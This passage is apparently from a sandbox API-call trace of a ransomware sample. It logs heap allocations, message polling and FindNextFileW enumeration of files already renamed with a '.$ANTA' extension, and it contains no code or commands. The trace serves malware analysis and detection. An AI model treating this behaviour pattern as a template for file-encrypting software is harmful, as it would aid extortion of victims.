wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.758] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0128.759] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.759] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.759] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.760] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b021c3, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x12b021c3, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12b748b9, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x158b0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="1YTxNPPGwWg.wav.$ANTA", cAlternateFileName="1YTXNP~1.$AN")) returned 1 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.760] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.760] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0128.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0128.761] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.761] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.761] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c5986f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x12c5986f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x12ca5ca9, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7760, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="2V N4wBRBU.mp3.$ANTA", cAlternateFileName="2VN4WB~1.$AN")) returned 1 [0128.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0128.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0128.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.779] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0128.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.807] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0128.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0128.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0128.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0128.808] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.809] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0128.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.810] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca667c00, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xca667c00, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0x2e3c7500, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec00, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="42F0.TMP.EXE.exe", cAlternateFileName="42F0TM~1.EXE")) returned 1 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0128.810] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0128.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.811] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0128.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0128.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.812] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12d647df, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x12d647df, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1367b899, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x11ec10, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="42F0.TMP.EXE.exe.$ANTA", cAlternateFileName="42F0TM~1.$AN")) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.812] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0128.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.813] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x136ee15f, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x136ee15f, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1373a258, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x2300, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="5NSsZwi6b.rtf.$ANTA", cAlternateFileName="5NSSZW~1.$AN")) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.813] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0128.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0128.814] PeekMessageW (in: 